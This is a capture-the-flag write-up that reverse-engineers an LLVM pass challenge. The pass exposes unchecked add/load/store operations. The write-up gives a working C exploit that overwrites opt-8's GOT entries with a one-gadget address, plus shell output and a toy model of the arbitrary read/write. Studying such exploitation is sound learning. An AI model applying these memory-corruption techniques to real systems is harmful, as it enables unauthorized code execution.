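Here llvm::Function::begin and llvm::Function::end, as the names suggest, return iterators to the first and the past-the-last BasicBlock of the function. The loop walks the basic blocks of the o0o0o0o0 function in the IR and hands each one to sub_6B80 for further processing.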

unsigned __int64 __fastcall sub_6AC0(__int64 a1, llvm::Function *a2)
{
  llvm::BasicBlock *v3; // [rsp+20h] [rbp-30h]
  __int64 v4; // [rsp+38h] [rbp-18h] BYREF
  __int64 v5[2]; // [rsp+40h] [rbp-10h] BYREF

  v5[1] = __readfsqword(0x28u);
  v5[0] = llvm::Function::begin(a2);
  while ( 1 )
  {
    v4 = llvm::Function::end(a2);
    if ( (llvm::operator!=(v5, &v4) & 1) == 0 )
      break;
    v3 = llvm::ilist_iterator<llvm::ilist_detail::node_options<llvm::BasicBlock,false,false,void>,false,false>::operator*(v5);
    sub_6B80(a1, v3);
    llvm::ilist_iterator<llvm::ilist_detail::node_options<llvm::BasicBlock,false,false,void>,false,false>::operator++(
      v5,
      0LL);
  }
  return __readfsqword(0x28u);
}

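sub_6B80 walks the instructions in a basic block and matches them against a set of operations, much like a VM implementing its own instruction set.

It begins with a loop, excerpted below. llvm::Instruction::getOpcode returns the instruction's opcode, which must be 55 for the later logic to run. Opcode values are defined in /include/llvm/IR/Instruction.def, where 55 corresponds to call.

The function therefore defines operations for the function names pop, push, store, load, add, and min.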

  v39[1] = __readfsqword(0x28u);
  v39[0] = llvm::BasicBlock::begin(a2);
  while ( 1 )
  {
    v38 = llvm::BasicBlock::end(a2);
    if ( (llvm::operator!=(v39, &v38) & 1) == 0 )
      break;
    v36 = llvm::dyn_cast<llvm::Instruction,llvm::ilist_iterator<llvm::ilist_detail::node_options<llvm::Instruction,false,false,void>,false,false>>(v39);
    if ( llvm::Instruction::getOpcode(v36) == 55 )
    {
      v35 = llvm::dyn_cast<llvm::CallInst,llvm::Instruction>(v36);
      if ( v35 )
      {
        s1 = malloc(0x20uLL);
        CalledFunction = llvm::CallBase::getCalledFunction(v35);
        Name = llvm::Value::getName(CalledFunction);
        *s1 = *Name;
        *(s1 + 1) = Name[1];
        *(s1 + 2) = Name[2];
        *(s1 + 3) = Name[3];
        if ( !strcmp(s1, "pop") )
        ...
        else if ( !strcmp(s1, "push") )
        ...
        else if ( !strcmp(s1, "store") )
        ...
        else if ( !strcmp(s1, "load") )
        ...
        else if ( !strcmp(s1, "add") )
        ...
        else if ( !strcmp(s1, "min") && llvm::CallBase::getNumOperands(v35) == 3 )
        ...
     }
...

The matching entry in Instruction.def:

HANDLE_OTHER_INST(55, Call   , CallInst   )  // Call a function
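Instruction.def is an "X-macro" file: it is included several times with the HANDLE_* macros defined differently each time, so a single table yields both the opcode numbers and their names. The sketch below imitates that technique with a hypothetical two-entry table. Only the number 55 for Call comes from the line above (Ret is 1), and all TOY_/Toy names are invented for illustration.

```cpp
#include <string>

// A tiny stand-in for Instruction.def: one row per instruction.
#define TOY_INSTRUCTION_TABLE(HANDLE) \
    HANDLE(1, Ret)                    \
    HANDLE(55, Call)

// Expansion 1: turn each row into an enumerator (ToyRet = 1, ToyCall = 55).
enum ToyOpcode {
#define TOY_MAKE_ENUM(num, name) Toy##name = num,
    TOY_INSTRUCTION_TABLE(TOY_MAKE_ENUM)
#undef TOY_MAKE_ENUM
};

// Expansion 2: turn each row into a switch case mapping number -> name.
std::string toy_opcode_name(unsigned opcode) {
    switch (opcode) {
#define TOY_MAKE_CASE(num, name) case num: return #name;
        TOY_INSTRUCTION_TABLE(TOY_MAKE_CASE)
#undef TOY_MAKE_CASE
    default:
        return "<unknown>";
    }
}
```

Because the numbers live in a table that changes between releases, comparing against a literal such as 55 only works for the LLVM version the binary was built with.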

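The most important handler is add. It relies on these APIs:

llvm::CallBase::getNumOperands returns the number of operands of the instruction; for a call this is the number of function arguments plus one, the extra operand being the callee.
llvm::CallBase::getArgOperand takes the index of the argument to fetch as its second parameter.
llvm::ConstantInt::getZExtValue (get zero-extended value) returns the constant's value zero-extended to 64 bits.

reg1_0 and reg2_0 are two global variables that can be thought of as two registers. If the first argument is 1, reg is pointed at reg1_0; if it is 2, reg is pointed at reg2_0. The value that reg points to is then incremented by the second argument.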

  else if ( !strcmp(s1, "add") )
        {
          if ( llvm::CallBase::getNumOperands(v35) == 3 )
          {
            v17 = llvm::CallBase::getArgOperand(v35, 0);
            reg = 0LL;
            v15 = llvm::dyn_cast<llvm::ConstantInt,llvm::Value>(v17);
            if ( v15 )
            {
              v14 = llvm::ConstantInt::getZExtValue(v15);
              if ( v14 == 1 )
                reg = reg1_0;
              if ( v14 == 2 )
                reg = reg2_0;
            }
            if ( reg )
            {
              v13 = llvm::CallBase::getArgOperand(v35, 1u);
              v12 = llvm::dyn_cast<llvm::ConstantInt,llvm::Value>(v13);
              if ( v12 )
                *reg += llvm::ConstantInt::getZExtValue(v12);
            }
          }
        }

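load takes one argument. If it is 1, the value held in reg1_0 is used as an address and the value read from that address is written into reg2_0; if it is 2, the value held in reg2_0 is used as the address and the result is stored into reg1_0. No bounds check is applied to the address, so this is an arbitrary-address read.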

else if ( !strcmp(s1, "load") )
        {
          if ( llvm::CallBase::getNumOperands(v35) == 2 )
          {
            v21 = llvm::CallBase::getArgOperand(v35, 0);
            v20 = 0LL;
            v19 = llvm::dyn_cast<llvm::ConstantInt,llvm::Value>(v21);
            if ( v19 )
            {
              v18 = llvm::ConstantInt::getZExtValue(v19);
              if ( v18 == 1 )
                v20 = reg1_0;
              if ( v18 == 2 )
                v20 = reg2_0;
            }
            if ( v20 == reg1_0 )
              *reg2_0 = **reg1_0;
            if ( v20 == reg2_0 )
              *reg1_0 = **reg2_0;
          }
        }

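store takes one argument. If it is 1, the value in reg2_0 is written to the memory that the address held in reg1_0 points to; if it is 2, the value in reg1_0 is written to the memory that the address held in reg2_0 points to. This is an arbitrary-address write.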

else if ( !strcmp(s1, "store") )
        {
          if ( llvm::CallBase::getNumOperands(v35) == 2 )
          {
            v25 = llvm::CallBase::getArgOperand(v35, 0);
            v24 = 0LL;
            v23 = llvm::dyn_cast<llvm::ConstantInt,llvm::Value>(v25);
            if ( v23 )
            {
              v22 = llvm::ConstantInt::getZExtValue(v23);
              if ( v22 == 1 )
                v24 = reg1_0;
              if ( v22 == 2 )
                v24 = reg2_0;
            }
            if ( v24 == reg1_0 )
            {
              **reg1_0 = *reg2_0;
            }
            else if ( v24 == reg2_0 )
            {
              **reg2_0 = *reg1_0;
            }
          }
        }
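The add, load and store handlers above can be modelled as a two-register machine whose registers hold raw 64-bit addresses. The following is a toy model written for illustration, not code recovered from the challenge: ToyVM and bump_slot are hypothetical names, and a local variable stands in for the memory slot being attacked.

```cpp
#include <cstdint>

struct ToyVM {
    std::uint64_t reg1 = 0;
    std::uint64_t reg2 = 0;

    // Maps the first call argument (1 or 2) to a register, else nullptr.
    std::uint64_t *select(int index) {
        if (index == 1) return &reg1;
        if (index == 2) return &reg2;
        return nullptr;
    }

    // add(n, value): reg_n += value
    void add(int index, std::uint64_t value) {
        if (std::uint64_t *reg = select(index)) *reg += value;
    }

    // load(1): reg2 = [reg1]    load(2): reg1 = [reg2]   (no bounds check)
    void load(int index) {
        if (index == 1) reg2 = *reinterpret_cast<std::uint64_t *>(reg1);
        else if (index == 2) reg1 = *reinterpret_cast<std::uint64_t *>(reg2);
    }

    // store(1): [reg1] = reg2   store(2): [reg2] = reg1  (no bounds check)
    void store(int index) {
        if (index == 1) *reinterpret_cast<std::uint64_t *>(reg1) = reg2;
        else if (index == 2) *reinterpret_cast<std::uint64_t *>(reg2) = reg1;
    }
};

// Read-modify-write of an arbitrary 64-bit slot using only VM operations.
std::uint64_t bump_slot(std::uint64_t initial, std::uint64_t delta) {
    std::uint64_t slot = initial;                        // memory to corrupt
    ToyVM vm;
    vm.add(1, reinterpret_cast<std::uint64_t>(&slot));   // reg1 = &slot
    vm.load(1);                                          // reg2 = slot
    vm.add(2, delta);                                    // reg2 += delta
    vm.store(1);                                         // slot = reg2
    return slot;
}
```

Since both registers start at zero, a single add is enough to set a register to any chosen address, and the add / load / add / store sequence in bump_slot rewrites whatever 64-bit value lives there.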

In addition, the GOT of the supplied opt-8 is writable and PIE is disabled, so overwriting a GOT entry in opt with a one gadget is enough to get a shell.

pwndbg> checksec
[*] '/home/ayoung/pwn/llvm/opt-8'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

pwndbg> 

exp

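In more detail: first use add to put the address of a GOT entry into reg1, then load(1) to read the function's real address into reg2 (mov reg2, [reg1]), then add again to turn that address into the one gadget address, and finally store(1) to write reg2 into the GOT entry that reg1 points to (mov [reg1], reg2). The write-ups online all overwrite free. I originally wanted to overwrite malloc, but it did not seem to be called afterwards, so I simply overwrite a run of consecutive GOT entries; getting a shell is all that matters.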

//clang -emit-llvm -S exp.c -o exp.ll
void store(int a);
void load(int a);
void add(int a, int b);

void o0o0o0o0(){
    add(1, 0x77e120);
    load(1);
    add(2, 0x732dc);
    store(1);
    add(1, 0x8);
    store(1);
    add(1, 0x8);
    store(1);
    add(1, 0x8);
    store(1);
    add(1, 0x8);
    store(1);
    add(1, 0x8);
    store(1);
    add(1, 0x8);
    store(1);
    add(1, 0x8);
    store(1);
    add(1, 0x8);
    store(1);
    add(1, 0x8);
}

ayoung@ubuntu:~/pwn/llvm$ ./opt-8 -load ./VMPass.so -VMPass ./exp.ll
WARNING: You're attempting to print out a bitcode file.
This is inadvisable as it may cause display problems. If
you REALLY want to taste LLVM bitcode first-hand, you
can force output with the `-f' option.

$ whoami
ayoung
$ 

reference